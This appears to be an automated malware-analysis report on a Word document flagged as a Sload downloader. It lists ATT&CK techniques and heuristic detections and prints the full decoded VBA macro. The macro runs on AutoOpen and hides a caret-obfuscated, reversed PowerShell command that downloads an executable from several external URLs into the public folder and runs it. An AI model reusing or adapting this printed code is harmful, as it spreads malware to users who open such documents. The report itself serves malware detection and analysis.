Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that uses the Shell() function to execute a command. This command appears to be constructing a URL, likely for downloading a second-stage payload. The ClamAV detection and the presence of the Shell() call strongly indicate downloader functionality.
Heuristics (7)

- ClamAV: Doc.Downloader.Sload-6794077-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6794077-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 676a91cfa0d88506904e45edc512fa1230c079c071d22a9eb8f0ed7d58f9de1a) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3271 bytes |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "izXzCqwwWUCwhk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If WsGQFM Or 2 Then
tBFjh = "TI"
End If
If AOJzp <= 2 Then
UjLOU = "M"
End If
If qMmVN <= LkijE Then
UYfkP = "OwvpULWEZkUQ"
End If
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
If lbQzb Xor wCJnfX Then
fmuVTW = "ULNGXfUK"
End If
If OJcvIm Eqv HDNhv Then
qSQwGh = "PHdmscltmFlnhI"
End If
If kRpji And cFWQvW Then
FclmsY = "PijB"
End If
If GPfus >= imhUU Then
UWtFzu = "ZEtIIOXLrkzD"
End If
End Sub
Attribute VB_Name = "caHIKoBPD"
Function DTqpj()
wjPzoWkSo = "d /V^:^ON/" + "C" + """" + "^s^e^t lN=^ ^ ^" + " ^ ^ ^ ^ ^ ^"
wKGNtc = " ^ ^ ^ ^ ^}^" + "}^{^hc^t^ac^}^;^k^" + "a^er^b^;^ir^j" + "^$^ ^m^etI^-^e^k^ovn" + "^I;)^ir^j^$^ ^," + "^fB^J^$(^e^l^"
LIJaYBX = "i^F^d^a^o^ln^wo^D^." + "^i^w^Y^$^{^yr^t" + "^{)^B^Kj^$ n^" + "i^ ^f^B^J^$(^hc^a^e" + "r^o^f;^'^e^x^e^.^'^+" + "^U^t^L^$^+^'^\'"
AMjHaSCGI = "+c^i^l^b^u^p" + "^:vne^$^=^ir^" + "j^$^;^'^4^9" + "^3^'^ ^=^ ^U^t^"
kamHIjcmQ = "L^$^;)^'^@^'" + "(^t^i^l^p^S^." + "^'^Q/^ur^.^e" + "n^g^i^s^e^dn^a^l^.n^" + "a^m^i^d^.^w^w^w//^:" + "^p^t^t^h@yn/^t^"
If UFdAQ <= iVhiFr Then
HZBft = "fdKRTHclIi"
End If
If KJHCqM Or QKCVC Then
RsiqR = "O"
End If
lYGYPUN = "i^.e^l^o^ic^s^i" + "v^e^l^l^ed^on^" + "i^dra^i^g^l^i" + "//^:^p^t^t^h^@^g"
DTqpj = wjPzoWkSo + wKGNtc + LIJaYBX + AMjHaSCGI + kamHIjcmQ + lYGYPUN
If wwtood Xor wWADt Then
wiwUf = "PwHu"
End If
If oJtop Eqv 17 Then
nVZvj = "SX"
End If
If HApCY > 4 Then
vkloVn = "KFkEomKfI"
End If
End Function
Function vNtBMCjurWl()
inRtnqGO = "/^k^u.^oc^.^s^ec^" + "ivr^e^s^k^e^p^sn" + "^i//^:^p^t^t^h^" + "@C/^m^oc^.^l^a^" + "g^o^f^j//^:^p^"
WBMdqom = "t^t^h@^XC^s^" + "U/^e^b^.^yn" + "^a^j//^:^p^t^t^" + "h^'^=^B^K^j^$^;" + "^tn^e^i^lC^b"
hluFDhvu = "^e^W^.^t^eN^" + " ^tc^e^j^b^o^" + "-^w^en^=^i^" + "w^Y^$^ ^l^l" + "^e^h^sr^e^w^o^p&&"
EBYlwaaJo = "^f^or /^L " + "%^p ^in (^3^4^9^;^-^" + "1^;^0)^d^o ^s^e^" + "t ^l^I=!^l^I!!lN:" + "~%^p,1!&&^i^f %^p ^e"
If nJNsrE > mpQWVc Then
Whbmzj = "KDdzpFwH"
End If
If NBbuSh Eqv zMjPs Then
KmzRo = "uwaR"
End If
sjiiN = "^q^u ^0 c^a^l^" + "l %^l^I:^~^-^3^5" + "^0%" + """" + ""
vNtBMCjurWl = inRtnqGO + WBMdqom + hluFDhvu + EBYlwaaJo + sjiiN
If wPpqCR Xor 16 Then
MTiCa = "RdwR"
End If
If qDiXwF Xor ckFfu Then
bpGwM = "oUBNcG"
End If
If Bwiilc <= iYDwiW Then
UwXiJ = "XzzA"
End If
End Function
Attribute VB_Name = "viiwhaUAKGfpC"
Function SjonJLuoL(RGYjoAZnsmE As String)
Const QrQBzLuD = 623250762 - 623250762
If VwcuN > JznWwY Then
bFOjBh = "P"
End If
If LThwa >= mXbHsT Then
mIdGY = "KLcvNiBQG"
End If
Shell# RGYjoAZnsmE, QrQBzLuD
If DhaRbj And jLAwWQ Then
IBcaYa = "jdM"
End If
If UPZWj Or cKold Then
jwQpU = "NFi"
End If
If zofcY Eqv 4 Then
UDOiD = "aJo"
End If
End Function
```